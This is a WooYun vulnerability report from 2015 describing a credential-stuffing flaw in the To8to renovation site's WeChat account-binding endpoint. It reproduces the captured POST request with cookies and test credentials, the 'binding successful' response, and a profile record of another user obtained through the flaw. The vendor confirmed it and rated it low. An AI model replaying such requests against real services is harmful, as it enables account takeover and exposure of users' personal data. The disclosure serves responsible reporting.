当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141492

漏洞标题:土巴兔某处可撞库绑定别人的账号,泄漏用户信息

相关厂商:土巴兔装修网

漏洞作者: 路人甲

提交时间:2015-09-16 23:33

修复时间:2015-11-01 09:18

公开时间:2015-11-01 09:18

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

详细说明:

微信端 土巴兔
抓包如下

POST /ownerCenter/bindCompany/id/ZTQ4Zmx1b3JHSmZ1WWZQU3oyOGE3NjhFa01SVnk3WHlsejk2TkNkcTFOSzZqTnQxZjFQaHBldTFUeDIycVZUMTVEbzBteEV3WEJJY04xRnRQNUk0dVFPdW5QWFEwVDVPcFluYWQxTXVnNGlUaGxiVlJwZw%3D%3D/rand/9941 HTTP/1.1
Host: m.to8to.com
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 MicroMessenger/6.2.4 NetType/WIFI Language/zh_CN
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://m.to8to.com/ownerCenter/bind/type/3?code=031e47f29807f85c7751797337f9d93J&state=hoeven
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Cookie: PHPSESSID=msadan7ieo7jfjne1mvbng7255; Hm_lpvt_dbdd94468cf0ef471455c47f380f58d2=1442367509; Hm_lvt_dbdd94468cf0ef471455c47f380f58d2=1442358516,1442367267; to8to_cook=OkOcClPzRWV8ZFJlCIF4Ag==; to8to_landpage=http%3A//m.to8to.com/ownerCenter/index/%3Fcode%3D021a099ee677577ca53bc3dcc00871cN%26state%3Dhoeven; to8to_landtime=1442358515; to8to_nowpage=http%253A%252F%252Fm.to8to.com%252FownerCenter%252Fbind%252Ftype%252F3%253Fcode%253D031e47f29807f85c7751797337f9d93J%2526state%253Dhoeven; to8to_sourcepage=; to8to_tcode=sz; to8to_tname=%E6%B7%B1%E5%9C%B3; to8to_townid=1130; to8tocookieid=f313e2a500ff0527e5b82f0983fc65aa342656; uid=wKgCulX4pO2hZwqGC2KIAg==
Content-Length: 27
Origin: http://m.to8to.com
Accept-Encoding: gzip, deflate
name=aaa&password=123456


对那么进行撞库
看下图

1.jpg


{"msg":"绑定成功","code":"200","type":1,"cid":"119813","url":"https:\/\/open.weixin.qq.com\/connect\/oauth2\/authorize?appid=wx23b5153a96c64877&redirect_uri=http%3A%2F%2Fm.to8to.com%2FownerCenter%2Findex%2F&response_type=code&scope=snsapi_userinfo&state=hoeven#wechat_redirect"}


然后登陆下 看看

{"version":"2.5","action":"UserDetailAction","errorCode":0,"allRows":0,"data":{"uid":119813,"username":"xuyong","indentity":"0","goodlevel":"0","isactive":"0","nick":"xuyong","regdate":"1273493602","email":"","oldemail":"[email protected]","name_rz":"0","subdomain":"xuyong","credits":"6","cost_credits":"0","mobiles":"","regsource":"1","province":"","city":"","avatar":"","liveid":"2663921","style":[{"typeId":15,"value":"\u73b0\u4ee3"}],"house_type":7,"house_type_name":"\u4e00\u5c45","area":0,"type_id":0,"type_name":"","company_id":"","company_name":"","needupdate":1,"community_id":"","community_name":"","hasname":0,"sign":0,"progress_id":1,"newmessage":0,"projectNum":0,"projectId":0}}

漏洞证明:

可登陆微信端和APP等,我就不截图了

修复方案:

完善机制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-09-17 09:17

厂商回复:

感谢反馈

最新状态:

暂无